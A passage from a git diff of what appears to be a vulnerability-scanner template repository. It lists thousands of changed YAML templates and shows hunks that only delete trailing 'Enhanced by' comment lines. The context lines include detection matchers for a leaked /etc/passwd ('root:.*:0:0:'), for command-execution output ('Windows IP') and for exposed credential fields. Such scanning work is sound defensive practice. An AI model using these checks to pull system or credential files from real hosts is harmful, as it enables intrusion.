http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml | 2 +- http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml | 2 +- http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml | 2 +- http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml | 2 +- http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml | 2 +- .../thinkphp/thinkphp-509-information-disclosure.yaml | 2 +- http/vulnerabilities/tongda/tongda-path-traversal.yaml | 2 +- http/vulnerabilities/videoxpert-lfi.yaml | 2 +- http/vulnerabilities/vmware/vmware-hcx-log4j.yaml | 2 +- .../vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml | 2 +- http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml | 2 +- .../vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml | 2 +- .../vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml | 2 +- .../weaver/ecology/ecology-arbitrary-file-upload.yaml | 4 ++-- .../ecology/ecology-filedownload-directory-traversal.yaml | 2 +- .../ecology/ecology-springframework-directory-traversal.yaml | 2 +- .../weaver/ecology/ecology-syncuserinfo-sqli.yaml | 2 +- http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml | 2 +- http/vulnerabilities/weaver/oa-v9-uploads-file.yaml | 2 +- http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml | 2 +- .../wordpress/3dprint-arbitrary-file-upload.yaml | 2 +- http/vulnerabilities/wordpress/404-to-301-xss.yaml | 2 +- http/vulnerabilities/wordpress/ad-widget-lfi.yaml | 2 +- .../wordpress/advanced-access-manager-lfi.yaml | 2 +- http/vulnerabilities/wordpress/age-gate-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/age-gate-xss.yaml | 2 +- http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml | 2 +- .../vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml | 2 +- http/vulnerabilities/wordpress/analytify-plugin-xss.yaml | 2 +- http/vulnerabilities/wordpress/aspose-file-download.yaml | 2 +- http/vulnerabilities/wordpress/aspose-ie-file-download.yaml | 2 +- http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml | 2 +- .../vulnerabilities/wordpress/aspose-words-file-download.yaml | 2 +- .../wordpress/attitude-theme-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml | 2 +- http/vulnerabilities/wordpress/brandfolder-lfi.yaml | 2 +- http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/calameo-publications-xss.yaml | 2 +- .../wordpress/checkout-fields-manager-xss.yaml | 2 +- http/vulnerabilities/wordpress/cherry-file-download.yaml | 2 +- http/vulnerabilities/wordpress/cherry-lfi.yaml | 2 +- http/vulnerabilities/wordpress/church-admin-lfi.yaml | 2 +- http/vulnerabilities/wordpress/churchope-lfi.yaml | 2 +- http/vulnerabilities/wordpress/clearfy-cache-xss.yaml | 2 +- http/vulnerabilities/wordpress/curcy-xss.yaml | 2 +- http/vulnerabilities/wordpress/diarise-theme-lfi.yaml | 2 +- .../wordpress/eatery-restaurant-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml | 2 +- .../wordpress/flow-flow-social-stream-xss.yaml | 2 +- http/vulnerabilities/wordpress/hb-audio-lfi.yaml | 2 +- http/vulnerabilities/wordpress/health-check-lfi.yaml | 2 +- .../vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml | 2 +- http/vulnerabilities/wordpress/issuu-panel-lfi.yaml | 2 +- http/vulnerabilities/wordpress/members-list-xss.yaml | 2 +- http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml | 2 +- http/vulnerabilities/wordpress/mthemeunus-lfi.yaml | 2 +- http/vulnerabilities/wordpress/music-store-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/my-chatbot-xss.yaml | 2 +- http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml | 2 +- http/vulnerabilities/wordpress/new-user-approve-xss.yaml | 2 +- http/vulnerabilities/wordpress/newsletter-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/pieregister-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/sassy-social-share.yaml | 2 +- http/vulnerabilities/wordpress/seo-redirection-xss.yaml | 2 +- http/vulnerabilities/wordpress/shortcode-lfi.yaml | 2 +- .../wordpress/shortpixel-image-optimizer-xss.yaml | 2 +- .../wordpress/ultimatemember-open-redirect.yaml | 2 +- .../wordpress/weekender-newspaper-open-redirect.yaml | 2 +- .../wordpress/woocommerce-pdf-invoices-xss.yaml | 2 +- .../wordpress/wordpress-accessible-wpconfig.yaml | 2 +- .../wordpress/wordpress-woocommerce-listing.yaml | 2 +- http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml | 2 +- .../wordpress/wordpress-wordfence-waf-bypass-xss.yaml | 2 +- http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml | 2 +- http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-adaptive-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-all-export-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-ambience-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-finder-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-flagem-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml | 2 +- .../wordpress/wp-gtranslate-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/wp-insert-php-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-javospot-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-knews-xss.yaml | 2 +- .../wordpress/wp-memphis-documents-library-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 2 +- http/vulnerabilities/wordpress/wp-nextgen-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/wp-securimage-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-security-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-slideshow-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-socialfit-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-tutor-lfi.yaml | 2 +- http/vulnerabilities/wordpress/wp-vault-lfi.yaml | 2 +- .../wordpress/wp-woocommerce-email-verification.yaml | 2 +- .../wordpress/wp-woocommerce-file-download.yaml | 2 +- .../wordpress/wp-woocommerce-pdf-invoice-listing.yaml | 2 +- http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml | 2 +- http/vulnerabilities/wordpress/wptouch-open-redirect.yaml | 2 +- http/vulnerabilities/wordpress/wptouch-xss.yaml | 2 +- http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml | 2 +- http/vulnerabilities/yonyou/wooyun-path-traversal.yaml | 2 +- http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml | 2 +- http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 2 +- network/backdoor/backdoored-zte.yaml | 2 +- network/cisco-smi-exposure.yaml | 2 +- network/clickhouse-unauth.yaml | 2 +- network/cves/2001/CVE-2001-1473.yaml | 2 +- network/cves/2015/CVE-2015-3306.yaml | 2 +- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2017/CVE-2017-3881.yaml | 2 +- network/cves/2018/CVE-2018-2628.yaml | 2 +- network/cves/2018/CVE-2018-2893.yaml | 2 +- network/cves/2020/CVE-2020-7247.yaml | 2 +- network/cves/2021/CVE-2021-44521.yaml | 2 +- network/cves/2022/CVE-2022-0543.yaml | 4 ++-- network/cves/2022/CVE-2022-31793.yaml | 2 +- network/detect-addpac-voip-gateway.yaml | 2 +- network/detect-jabber-xmpp.yaml | 2 +- network/detection/dotnet-remoting-service-detect.yaml | 2 +- network/detection/esmtp-detect.yaml | 2 +- network/detection/gopher-detect.yaml | 2 +- network/detection/ibm-d2b-database-server.yaml | 2 +- network/detection/imap-detect.yaml | 2 +- network/detection/iplanet-imap-detect.yaml | 2 +- network/detection/java-rmi-detect.yaml | 2 +- network/detection/mikrotik-routeros-api.yaml | 2 +- network/detection/mongodb-detect.yaml | 2 +- network/detection/mysql-detect.yaml | 2 +- network/detection/openssh-detect.yaml | 2 +- network/detection/pgsql-detect.yaml | 2 +- network/detection/pop3-detect.yaml | 2 +- network/detection/rdp-detect.yaml | 2 +- network/detection/redis-detect.yaml | 2 +- network/detection/rpcbind-portmapper-detect.yaml | 2 +- network/detection/rsyncd-service-detect.yaml | 2 +- network/detection/rtsp-detect.yaml | 2 +- network/detection/samba-detect.yaml | 2 +- network/detection/vnc-service-detect.yaml | 2 +- network/enumeration/mongodb-info-enum.yaml | 2 +- network/exposed-adb.yaml | 2 +- network/exposed-redis.yaml | 4 ++-- network/exposed-zookeeper.yaml | 2 +- network/ftp-weak-credentials.yaml | 2 +- network/mongodb-unauth.yaml | 2 +- network/mysql-native-password.yaml | 2 +- network/sap-router-info-leak.yaml | 2 +- network/tidb-native-password.yaml | 2 +- network/tidb-unauth.yaml | 2 +- network/vsftpd-backdoor.yaml | 2 +- network/vulnerabilities/clockwatch-enterprise-rce.yaml | 2 +- 4098 files changed, 4093 insertions(+), 4101 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index e7dd0ca949..d8405b067f 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -55,4 +55,4 @@ dns: regex: - "IN\tCNAME\t(.+)" -# Enhanced by mp on 2022/03/13 + diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 873f361230..8d38c5bc62 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -36,4 +36,4 @@ dns: regex: - "IN\tCNAME\t(.+)" -# Enhanced by mp on 2022/03/13 + diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index 2754966097..703c5677ee 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -27,4 +27,4 @@ dns: regex: - "IN\tTXT\t(.+)" -# Enhanced by md on 2023/04/20 + diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index cecd6d809e..49e608fa08 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -170,4 +170,4 @@ dns: words: - ".iidns.com" -# Enhanced by mp on 2022/03/13 + diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index e8521c2652..7e723d2af9 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -23,4 +23,4 @@ dns: regex: - "IN\tDS\t(.+)" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index 2149bb5ecb..fd76e0fc85 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -23,4 +23,4 @@ dns: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/elasticbeantalk-takeover.yaml b/dns/elasticbeantalk-takeover.yaml index b6acc316d0..b650827729 100644 --- a/dns/elasticbeantalk-takeover.yaml +++ b/dns/elasticbeantalk-takeover.yaml @@ -48,4 +48,4 @@ dns: regex: - "IN\tCNAME\t(.+)" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml index c6de4a20ee..338d5338a5 100644 --- a/dns/mx-fingerprint.yaml +++ b/dns/mx-fingerprint.yaml @@ -29,4 +29,4 @@ dns: regex: - "IN\tMX\t(.+)" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index f2ebd382e9..f09fb548b3 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -82,4 +82,4 @@ dns: - "mx1-us1.ppe-hosted.com" - "mx2-us1.ppe-hosted.com" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml index 0dc25c93e8..815ab7246f 100644 --- a/dns/nameserver-fingerprint.yaml +++ b/dns/nameserver-fingerprint.yaml @@ -26,4 +26,4 @@ dns: regex: - "IN\tNS\t(.+)" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml index 35d5ce91b2..869efa1051 100644 --- a/dns/ptr-fingerprint.yaml +++ b/dns/ptr-fingerprint.yaml @@ -26,4 +26,4 @@ dns: regex: - "IN\tPTR\t(.+)" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index a3e2577710..ed2f9a84e1 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -22,4 +22,4 @@ dns: - "SERVFAIL" - "REFUSED" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index 23cf2711ed..365e9d4960 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -24,4 +24,4 @@ dns: - " ptr " condition: and -# Enhanced by mp on 2022/03/14 + diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml index fee487487b..50a0d5e76c 100644 --- a/dns/txt-fingerprint.yaml +++ b/dns/txt-fingerprint.yaml @@ -28,4 +28,4 @@ dns: regex: - "IN\tTXT\t(.+)" -# Enhanced by mp on 2022/03/14 + diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index 73a3a6d422..e3e46d27c9 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -22,4 +22,4 @@ dns: words: - "69.164.223.206" -# Enhanced by mp on 2022/03/14 + diff --git a/file/android/adb-backup-enabled.yaml b/file/android/adb-backup-enabled.yaml index 5c756ded96..2988be2c39 100644 --- a/file/android/adb-backup-enabled.yaml +++ b/file/android/adb-backup-enabled.yaml @@ -20,4 +20,4 @@ file: words: - "android:allowBackup=\"true\"" -# Enhanced by mp on 2022/02/09 + diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml index d0e3061b56..f4eff5cb00 100644 --- a/file/electron/node-integration-enabled.yaml +++ b/file/electron/node-integration-enabled.yaml @@ -21,4 +21,4 @@ file: words: - "nodeIntegration: true" -# Enhanced by mp on 2022/05/19 + diff --git a/file/logs/python-app-sql-exceptions.yaml b/file/logs/python-app-sql-exceptions.yaml index 11f0523665..c6b60ab84a 100644 --- a/file/logs/python-app-sql-exceptions.yaml +++ b/file/logs/python-app-sql-exceptions.yaml @@ -24,4 +24,4 @@ file: - 'ProgrammingError' - 'OperationalError' -# Enhanced by mp on 2022/10/05 + diff --git a/file/logs/suspicious-sql-error-messages.yaml b/file/logs/suspicious-sql-error-messages.yaml index 11113cba6b..2b287a97e7 100644 --- a/file/logs/suspicious-sql-error-messages.yaml +++ b/file/logs/suspicious-sql-error-messages.yaml @@ -41,4 +41,4 @@ file: - 'near \"\*\"\: syntax error' - 'SELECTs to the left and right of UNION do not have the same number of result columns' -# Enhanced by mp on 2022/10/12 + diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index fa3d87dea9..cf311d7290 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -51,4 +51,4 @@ file: - 'window\.name' - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' -# Enhanced by mp on 2022/09/14 + diff --git a/headless/headless-open-redirect.yaml b/headless/headless-open-redirect.yaml index c1d1593659..fd2782eb81 100644 --- a/headless/headless-open-redirect.yaml +++ b/headless/headless-open-redirect.yaml @@ -123,4 +123,4 @@ headless: - "Evil.Com - We get it...Daily." condition: and -# Enhanced by cs on 2023/03/10 + diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml index 063a0577e8..adfee9aaa2 100644 --- a/headless/window-name-domxss.yaml +++ b/headless/window-name-domxss.yaml @@ -93,4 +93,4 @@ headless: kval: - alerts -# Enhanced by mp on 2022/09/14 + diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml index c856e2ab8e..9314b29f0a 100644 --- a/http/cnvd/2018/CNVD-2018-13393.yaml +++ b/http/cnvd/2018/CNVD-2018-13393.yaml @@ -31,4 +31,4 @@ http: - "login_met_cookie($metinfo_admin_name);" condition: and -# Enhanced by mp on 2022/07/05 + diff --git a/http/cnvd/2019/CNVD-2019-01348.yaml b/http/cnvd/2019/CNVD-2019-01348.yaml index fece77ba06..865bbdd6c3 100644 --- a/http/cnvd/2019/CNVD-2019-01348.yaml +++ b/http/cnvd/2019/CNVD-2019-01348.yaml @@ -36,4 +36,4 @@ http: - "Choose Language (选择语言)" condition: and -# Enhanced by mp on 2022/01/26 + diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 154dd7940b..247df3085e 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -36,4 +36,4 @@ http: - 'USER' condition: and -# Enhanced by cs on 2022/02/28 + diff --git a/http/cnvd/2019/CNVD-2019-19299.yaml b/http/cnvd/2019/CNVD-2019-19299.yaml index b550840463..7fa196e093 100644 --- a/http/cnvd/2019/CNVD-2019-19299.yaml +++ b/http/cnvd/2019/CNVD-2019-19299.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "Windows IP")' condition: and -# Enhanced by mp on 2022/05/12 + diff --git a/http/cnvd/2019/CNVD-2019-32204.yaml b/http/cnvd/2019/CNVD-2019-32204.yaml index f9eb2ed040..d080264670 100644 --- a/http/cnvd/2019/CNVD-2019-32204.yaml +++ b/http/cnvd/2019/CNVD-2019-32204.yaml @@ -29,4 +29,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml index 447921267e..191750af24 100644 --- a/http/cnvd/2020/CNVD-2020-23735.yaml +++ b/http/cnvd/2020/CNVD-2020-23735.yaml @@ -33,4 +33,4 @@ http: - "display_errors" condition: and -# Enhanced by mp on 2022/07/22 + diff --git a/http/cnvd/2020/CNVD-2020-26585.yaml b/http/cnvd/2020/CNVD-2020-26585.yaml index 71e72d80ff..c6e9d85f98 100644 --- a/http/cnvd/2020/CNVD-2020-26585.yaml +++ b/http/cnvd/2020/CNVD-2020-26585.yaml @@ -66,4 +66,4 @@ http: - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' internal: true -# Enhanced by mp on 2022/05/30 + diff --git a/http/cnvd/2020/CNVD-2020-46552.yaml b/http/cnvd/2020/CNVD-2020-46552.yaml index 44402ba0b9..04e18e656b 100644 --- a/http/cnvd/2020/CNVD-2020-46552.yaml +++ b/http/cnvd/2020/CNVD-2020-46552.yaml @@ -31,4 +31,4 @@ http: - 'status_code == 200' condition: and -# Enhanced by mp on 2022/05/18 + diff --git a/http/cnvd/2020/CNVD-2020-56167.yaml b/http/cnvd/2020/CNVD-2020-56167.yaml index 0a752c7903..b0d494c697 100644 --- a/http/cnvd/2020/CNVD-2020-56167.yaml +++ b/http/cnvd/2020/CNVD-2020-56167.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/30 + diff --git a/http/cnvd/2020/CNVD-2020-62422.yaml b/http/cnvd/2020/CNVD-2020-62422.yaml index c3ad3b8d73..a4bd86ece7 100644 --- a/http/cnvd/2020/CNVD-2020-62422.yaml +++ b/http/cnvd/2020/CNVD-2020-62422.yaml @@ -34,4 +34,4 @@ http: - "ctpDataSource.password" condition: and -# Enhanced by mp on 2022/07/22 + diff --git a/http/cnvd/2020/CNVD-2020-67113.yaml b/http/cnvd/2020/CNVD-2020-67113.yaml index 893f3d4aac..d987a71437 100644 --- a/http/cnvd/2020/CNVD-2020-67113.yaml +++ b/http/cnvd/2020/CNVD-2020-67113.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cnvd/2020/CNVD-2020-68596.yaml b/http/cnvd/2020/CNVD-2020-68596.yaml index 5a513cb50f..cf5121c364 100644 --- a/http/cnvd/2020/CNVD-2020-68596.yaml +++ b/http/cnvd/2020/CNVD-2020-68596.yaml @@ -49,4 +49,4 @@ http: - DB_PREFIX condition: and -# Enhanced by mp on 2022/05/12 + diff --git a/http/cnvd/2021/CNVD-2021-01931.yaml b/http/cnvd/2021/CNVD-2021-01931.yaml index 50354c42fc..207f1bfa5a 100644 --- a/http/cnvd/2021/CNVD-2021-01931.yaml +++ b/http/cnvd/2021/CNVD-2021-01931.yaml @@ -36,4 +36,4 @@ http: - "extensions" condition: and -# Enhanced by cs on 06/03/2022 + diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index e9969effc7..4f6bfe8fda 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -33,4 +33,4 @@ http: words: - "http" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml index 14c2c53131..0542fab537 100644 --- a/http/cnvd/2021/CNVD-2021-10543.yaml +++ b/http/cnvd/2021/CNVD-2021-10543.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/05 + diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml index 46f249aeb5..e8f3b074cf 100644 --- a/http/cnvd/2021/CNVD-2021-14536.yaml +++ b/http/cnvd/2021/CNVD-2021-14536.yaml @@ -43,4 +43,4 @@ http: regex: - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' -# Enhanced by mp on 2022/03/28 + diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index 015c407da0..81757bc188 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/17 + diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index fd194fa6bf..2b2c31b292 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/23 + diff --git a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml index 8f673525f2..101b2f6778 100644 --- a/http/cnvd/2021/CNVD-2021-17369.yaml +++ b/http/cnvd/2021/CNVD-2021-17369.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/16 + diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml index 70d1b0e157..09b7fe67d9 100644 --- a/http/cnvd/2021/CNVD-2021-26422.yaml +++ b/http/cnvd/2021/CNVD-2021-26422.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index 9646f6cf4f..f0142d7e87 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml index 14828ebedc..9399b1f3dd 100644 --- a/http/cnvd/2021/CNVD-2021-30167.yaml +++ b/http/cnvd/2021/CNVD-2021-30167.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by cs on 2022/07/05 + diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml index 692a4936ad..2cea6e3752 100644 --- a/http/cnvd/2021/CNVD-2021-49104.yaml +++ b/http/cnvd/2021/CNVD-2021-49104.yaml @@ -47,4 +47,4 @@ http: status: - 200 -# Enhanced by cs on 2022/02/28 + diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml b/http/cnvd/2022/CNVD-2022-03672.yaml index d9f50263d2..057eba79fc 100644 --- a/http/cnvd/2022/CNVD-2022-03672.yaml +++ b/http/cnvd/2022/CNVD-2022-03672.yaml @@ -48,4 +48,4 @@ http: - "contains(body_2, 'Windows IP')" condition: and -# Enhanced by mp on 2022/05/12 + diff --git a/http/cnvd/2022/CNVD-2022-42853.yaml b/http/cnvd/2022/CNVD-2022-42853.yaml index ae734b9282..c9ab69cc09 100644 --- a/http/cnvd/2022/CNVD-2022-42853.yaml +++ b/http/cnvd/2022/CNVD-2022-42853.yaml @@ -39,4 +39,4 @@ http: words: - 'c8c605999f3d8352d7bb792cf3fdb25' -# Enhanced by mp on 2022/09/28 + diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 81fcfed417..747ad437da 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -34,4 +34,4 @@ http: words: - "_vti_bin/shtml.dll" -# Enhanced by mp on 2022/01/27 + diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0e1d8f6703..0c18ccc916 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -48,4 +48,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index a23155b360..18fd37356c 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -40,4 +40,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/01/27 + diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 054a242432..60b1312d1c 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -34,4 +34,4 @@ http: - '(\"" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 71296d4856..3b9d4b4954 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -38,4 +38,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 8fbf37cc42..b9ba40596b 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 71a0c2dca2..86ec12cfc2 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -39,4 +39,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index f7f79ac589..b34517231c 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 4714c774ea..d73fbeffeb 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 73ed469f7a..43b54bc045 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -42,4 +42,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 0d156411a7..b5ef74ed93 100644 --- 